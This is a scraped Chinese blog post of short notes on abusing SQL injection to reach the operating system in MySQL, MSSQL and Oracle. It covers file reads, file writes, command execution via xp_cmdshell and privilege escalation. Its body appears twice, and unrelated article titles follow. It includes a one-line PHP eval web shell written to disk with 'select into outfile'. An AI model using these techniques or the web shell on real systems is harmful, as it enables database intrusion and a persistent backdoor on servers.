SQL之利用操作系统
来源:互联网 发布:好看的电视剧 知乎 编辑:程序博客网 时间:2024/06/18 15:31
一访问文件系统
读文件:
MySQL:可以使用load data infile和load_file()函数读取文件,其中load_file()可以直接读取结果:select load_file('c:\1.txt');
MSSQL:可以使用bulk insert复制文件到数据库表中:bulk insert table from 'c:\1.txt';和读取文件:select * from table;
Oracle:可以使用Oracle Directory, Oracle Text读取文件
写文件:
MySQL:使用select into outfile(dumpfile)写入文件,例如:select '<? php eval($_POST['Jim']);?>' into outfile 'C:/2.txt';
MSSQL:使用xp_cmdshell扩展存储过程写入文件,例如:exec xp_cmdshell 'echo table 1>c:\test.txt'
Oracle:使用utl_file, DBMS_ADVISOR, Java实现文件写入
二.执行操作系统命令
1.MySQL不支持执行shell命令
2.Oracle
extproc、Java和DBMS_SCHEDULER是oracle运行操作系统命令的正式方法
3.MSSQL
xp_cmdshell只接收一个参数
读文件:
MySQL:可以使用load data infile和load_file()函数读取文件,其中load_file()可以直接读取结果:select load_file('c:\1.txt');
MSSQL:可以使用bulk insert复制文件到数据库表中:bulk insert table from 'c:\1.txt';和读取文件:select * from table;
Oracle:可以使用Oracle Directory, Oracle Text读取文件
写文件:
MySQL:使用select into outfile(dumpfile)写入文件,例如:select '<? php eval($_POST['Jim']);?>' into outfile 'C:/2.txt';
MSSQL:使用xp_cmdshell扩展存储过程写入文件,例如:exec xp_cmdshell 'echo table 1>c:\test.txt'
Oracle:使用utl_file, DBMS_ADVISOR, Java实现文件写入
二.执行操作系统命令
1.MySQL不支持执行shell命令
2.Oracle
extproc、Java和DBMS_SCHEDULER是oracle运行操作系统命令的正式方法
3.MSSQL
xp_cmdshell只接收一个参数
三.提升权限(获取管理员权限):
1.SQL Server
openrowset命令:SQL Server 2000上,所有用户均可调用openrowset, 而在SQL Server 2005上,该操作默认被禁用
2.Oracle
在Oracle中,通过web应用的SQL注入来提升权限非常困难。大多数提升权限的方法均需要PL/SQL注入。
阅读全文
0 0
- SQL之利用操作系统
- 计算机系统安全之利用操作系统自带命令杀毒
- sql之利用create语句创建表
- 操作系统之操作系统引论
- 在Oracle 8i的SQL*Plus中如何利用LOB字段存取操作系统二进制文件
- 利用InstallShield12制作安装包之三:判断操作系统类型的多种方法
- VxWorks Fuzzing 之道:VxWorks 工控实时操作系统漏洞挖掘调试与利用揭秘
- 利用python更新操作系统时间
- 操作系统复习之操作系统引论
- SQL语句之利用UNION查询生成报表
- 十五、Qt数据库 之 利用QSqlQuery类执行SQL语句
- MvMmallv5.5SQL注入之php的exp利用讲解
- 专业"偷懒"之利用sql生成Java实体类属性
- QT之利用QSqlQuery类执行SQL语句
- oracle 与 sql server 区别之08 操作系统的支持、版本和发行版
- Windows 10 操作系统中安装SQL Server 2008、Oracle之艰辛历程及感悟
- SQL Server之——安装MSSQL 提示操作系统不符合最低要求
- 操作系统之银行家算法
- Toolbar的使用
- SpringCloud微服务架构搭建(四):动态路由
- jmeter性能测试第一篇(安装)
- HDU1166:敌兵布阵(线段树单点修改)
- 深入理解前端移动开发中的viewport概念
- SQL之利用操作系统
- java IO笔记(SequenceInputStream)
- APUE第四章学习笔记
- UESTC 929Post office(贪心)
- 一个免费的内网穿透工具-sunny-ngrok
- javascripts参考手册(含es6)
- hdu1863(水)
- 数据结构实验之图论二:基于邻接表的广度优先搜索遍历
- ThreadLocal源码解读